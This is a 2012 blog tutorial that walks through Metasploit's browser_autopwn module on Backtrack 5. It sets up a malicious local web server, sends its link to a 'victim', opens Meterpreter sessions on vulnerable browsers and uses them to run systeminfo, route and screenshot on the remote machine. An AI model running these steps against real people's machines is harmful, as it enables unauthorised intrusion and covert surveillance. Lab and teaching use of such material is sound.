Tuesday, 11 September 2012

Browser Autopwn On Backtrack 5


Browser Autopwn 
Browser Autopwn

In this Test 
  • We use the browser_autopwn module .
  • This module creates a local server in our machine which contains different exploits .
  • Whenever the user open our link , the exploit started against the browser and creates a session .
LETS BEGIN 
  • First step is to open a terminal and enter the command 'msfconsole '.
  • Command Used : msfconsole 
  • See the below image for more details - 
msfconsole

SETUP MODULE 
  • Command Used : use server/browser_autopwn 
  • See the below image for more details - 
setup module

SHOW OPTIONS 
  • Use this comamnd to see all the Module Options .
  • See the below image for more details - 
show options

SET LHOST & URIPATH 
  • Now set the Local Host( Local Host ).
  • Command Used : set LHOST <your ip address>
  • Set the URIPATH Address .
  • Command Used : set URIPATH /
  • See the below image for more details - 
set lhost and uripath

RUN 
  • Run your Module .
  • Command Used : run
  • See the below image for more details- 
run module

  • The below image shows the local ip , send that ip to the victim .
  • It look like http://192.168.118.136:8080/
  • When the user open this link in his browser , it gives the response as shown in the below image - 
  • If the victim browser is vulnerable , it open  a sessions.
  • See the below image for more details -
session list

 SESSION LIST
  • Command Used : sessions -l 
  • It shows the Active sessions name Information and connect.
  • See the below image for more details - 
session list

OPEN SESSIONS
  • To open the Active sessions ,enter the command given below .
  • Command Used : sessions -i 1 
  • See the below image for more details - 
open sessions

METERPRETER SESSIONS 
  • Once you are in  use different commands to gather information like as shown below - 
  • Command 1 : ipconfig : Used this command to get the ip address of remote system 
  • Command 2 : systeminfo : It shows the system information .
  • See the below image for more details - 
meterpreter sessions

ROUTE COMMAND 
  • See the below image for more details - it shows the Subnet Netmask and Gateway .
route command

SCREENSHOT 
  • Command Used : screenshot 
  • With this command you can take a screenshot of a victim machine . 
  • See the below image for more details - 
screenshots

THIS IS HOW WE CAN AUTOPWN THE BROWSER ON BACKTRACK 5 

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)